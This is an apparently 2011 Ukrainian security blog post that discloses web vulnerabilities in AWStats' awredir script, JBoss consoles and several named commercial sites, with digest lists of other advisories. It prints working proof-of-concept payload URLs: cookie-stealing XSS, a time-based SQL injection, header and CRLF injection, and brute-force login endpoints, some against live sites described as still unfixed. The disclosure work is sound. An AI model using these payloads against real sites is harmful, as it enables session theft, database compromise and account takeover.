Websecurity - Веб безпека

У вересні, 02.09.2011, я знайшов Cross-Site Scripting, Redirector, SQL Injection, HTTP Response Splitting та CRLF Injection уразливості в AWStats (в awredir). Про що я вже повідомив розробнику на минулому тижні (але він так і не виправив їх).

З AWStats постачається скрипт Advanced Web Redirector (awredir.pl), який має численні уразливості. В 2008 році trev та tx вже виявили в ньому XSS і Redirector уразливості.

Як я виявив, версія awredir 1.1 (build 1.5) була не вразлива до XSS, зато версія 1.1 (build 1.6) вже була вразлива.

В версії 1.1 та попередніх версіях скрипта є XSS, Redirector та SQL Injection уразливості. А в версії 1.2 додали захист - параметр key, що повинен бути рівний md5($KEYFORMD5.$UrlParam), де $KEYFORMD5 - це секретне слово, а $UrlParam - це параметр url. Який може і не використовуватися в скрипті (якщо $KEYFORMD5 пустий), а також його можна виявити підбором (знаючи робочу пару параметрів url та key). Параметр key буде необхідний для версії 1.2 скрипта для проведення Redirector, SQL Injection, HTTP Response Splitting і CRLF Injection атак.

В версії 1.2 виправили XSS, але Redirector і SQLi дірки залишилися та додали HTTPRS, CRLF Injection і дві нові XSS.

XSS (в версіях <=1.1):

http://site/awredir.pl?url=javascript:alert(document.cookie)

Redirector:

http://site/awredir.pl?url=http://websecurity.com.ua

В версії 1.2:

http://site/awredir.pl?key=0f3830803a70cc1636af3548b66ed978&url=http://websecurity.com.ua

SQL Injection:

http://site/awredir.pl?url=’%20and%20benchmark(10000,md5(now()))/*

В версії 1.2:

http://site/awredir.pl?key=f38ed1cdb04c8bda5386f7755a4e1d3e&url='%20and%20benchmark(10000,md5(now()))/*

SQL Injection атака можлива, якщо включений запис в БД ($TRACEBASE) та підключений DBI.

XSS (в версії 1.2):

http://site/awredir.pl?url=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/awredir.pl?key=%3Cscript%3Ealert(document.cookie)%3C/script%3E

HTTP Response Splitting:

http://site/awredir.pl?key=04ed5362e853c72ca275818a7c0c5857&url=%0AHeader:1

Що може використовуватися для включення хедерів, в тому числі для XSS і Redirection атак.

CRLF Injection:

http://site/awredir.pl?key=4b9faa91e2529400c4f3c70833b4e4a5&url=%0AText

CRLF Injection в логи можлива при включеному $DEBUG і/або $TRACEFILE.

Уразливі всі версії AWStats (6.0, 7.0 та попередні версії).

03.12.2010

У серпні, 09.08.2010, я знайшов Abuse of Functionality, Insufficient Anti-automation та Cross-Site Scripting уразливості на сайті http://websiteoptimization.com (зокрема на його піддомені http://analyze.websiteoptimization.com). Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше.

21.09.2011

Abuse of Functionality:

http://analyze.websiteoptimization.com/authenticate.php?url=http://www.google.com

Через даний функціонал можна проводити атаки на інші сайти. А також DoS атаку на сам сервіс. Про подібні уразливості я писав в статті Використання сайтів для атак на інші сайти.

Insufficient Anti-automation:

На даній сторінці використовується вразлива капча. Капчу можна обійти посилаючи одну і ту саму робочу пару значень параметрів session і captcha.

XSS:

• alert(document.cookie)
• цікавий
• html включення

Дані уразливості досі не виправлені.

26.11.2010

У серпні, 09.08.2010, я знайшов Cross-Site Scripting уразливість на сайті http://www.4post.com.ua (онлайн ЗМІ). Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на www.4post.com.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

20.09.2011

XSS:

• alert(document.cookie)

Адміни спробували виправити дану уразливість (при цьому мені не подякувавши, як за звичай роблять ламєра). Але зробили це некоректно і при невеликій зміні коду вона знову працює.

XSS (з MouseOverJacking):

• alert(document.cookie)
• цікавий

Дана уразливість досі не виправлена.

В даній добірці уразливості в веб додатках:

• McAfee Firewall Reporter GeneralUtilities.pm isValidClient Authentication Bypass Vulnerability (деталі)
• Multiple XSS vulnerabilities in Photopad (деталі)
• Novell ZENworks Asset Management Path Traversal File Overwrite Remote Code Execution Vulnerability (деталі)
• File Content Disclosure in Wikipad (деталі)
• Certain HP Photosmart Printers, Remote Unauthorized Access, Cross Site Scripting (XSS) (деталі)
• Information Disclosure in Arctic Fox CMS (деталі)
• IBM Tivoli Directory Server ibmslapd.exe SASL Bind Request Remote Code Execution Vulnerability (деталі)
• Path disclosure in ArtGK CMS (деталі)
• RSA, The Security Division of EMC, announces the release of Adaptive Authentication (On-Premise) Flash File Security Patch (деталі)
• XSS vulnerability in Gollos (деталі)

02.12.2010

У серпні, 09.08.2010, я знайшов Cross-Site Scripting та Insufficient Anti-automation уразливості на сайті http://www.htmlvalidator.com. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на online.htmlvalidator.com.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

19.09.2011

XSS:

https://www.htmlvalidator.com/htmlval/webemailform.php?s=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Insufficient Anti-automation:

https://www.htmlvalidator.com/htmlval/webemailform.php

Якщо XSS вже виправлена, то IAA досі так і не виправлена.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах WP Forum Server та Fast Secure Contact Form. Для котрих з’явилися експлоіти. WP Forum Server - це плагін для створення форуму, Fast Secure Contact Form - це плагін контактної форми.

• SQL Injection in WP Forum Server wordpress plugin (деталі)
• SQL Injection in WP Forum Server wordpress plugin (деталі)
• XSS in Fast Secure Contact Form wordpress plugin (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• HP Network Node Manager i (NNMi), Local Unauthorized Read Access to Files, Remote Cross Site Scripting (XSS) (деталі)
• Vulnerabilities in phpMyAdmin (деталі)
• HP Network Node Manager i (NNMi) for HP-UX, Linux, Solaris, and Windows running Java, Remote Denial of Service (DoS) (деталі)
• ZOHO ManageEngine ADSelfService multiple vulnerabilities (деталі)
• HP Network Node Manager i (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Information Disclosure (деталі)
• Kunena SQL Injection Vulnerability & Information Leakage (деталі)
• O2 classic router: persistent cross site scripting (XSS) and cross site request forgery (CSRF) (деталі)
• python-django security update (деталі)
• Linksys WRT54G - read router password from file placed on FTP (деталі)
• Path disclosure in Xaraya (деталі)

04.06.2011

У березні, 06.03.2010, я знайшов Information Leakage та Brute Force уразливості в JBoss Application Server (JBoss AS). Які я виявив на одному сайті Укртелекома. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

09.09.2011

Information Leakage:

http://site/status
http://site/status?full=true

Публічно доступна статистика роботи сервера з переліком всіх його сервісів.

Brute Force:

http://site/jmx-console/
http://site/web-console/
http://site/admin-console/ (починаючи з версії 5.1.0)
http://site/jbossws/ (зустрічаються сервери, де на даний ресурс пароль не встановлено)

Та інші приватні ресурси з BF уразливістю (що, як і вищенаведені ресурси, окрім Admin Console, сховані за Basic Authentication). Список всіх ресурсів конкретного сервера можна побачити на сторінці status?full=true.

Уразливі JBoss 3.2.7, JBoss 4.0.5.GA, JBoss 5.0 та попередні версії.

22.11.2010

У серпні, 04.08.2010, я знайшов Cross-Site Scripting, Brute Force та Insufficient Anti-automation уразливості на сайті http://kshop.com.ua (онлайн магазин). Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливості на optik.kiev.ua.

Детальна інформація про уразливості з’явиться пізніше.

08.09.2011

XSS:

http://kshop.com.ua/asearch/%22%3E%3Cimg%20src=1%20onerror=alert(1)%3E.html

Brute Force:

http://kshop.com.ua/login.html
http://kshop.com.ua/inc/login.php?login&login=1&passw=1

Insufficient Anti-automation:

http://kshop.com.ua/login.html
http://kshop.com.ua/inc/login.php?restore&remail=1

Даний сайт зараз не працює. Так і не виправивши уразливості, власники сайта вирішили прикрити свій онлайн магазин.

В даній добірці уразливості в веб додатках:

• Cisco Network Access Control Guest Server System Software Authentication Bypass Vulnerability (деталі)
• CGI:IRC XSS issue (деталі)
• HP Operations for UNIX, Remote Cross Site Scripting (XSS), Unauthorized Access (деталі)
• SourceBans Version 1.4.7 XSS (деталі)
• THOMSON Router XSS (деталі)
• XSS vulnerability in RunCMS (деталі)
• Vulnerability in xmlsec1 (деталі)
• Path disclosure in RunCMS (деталі)
• HP Network Node Manager i (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Unauthorized Access (деталі)
• SQL Injection in RunCMS (деталі)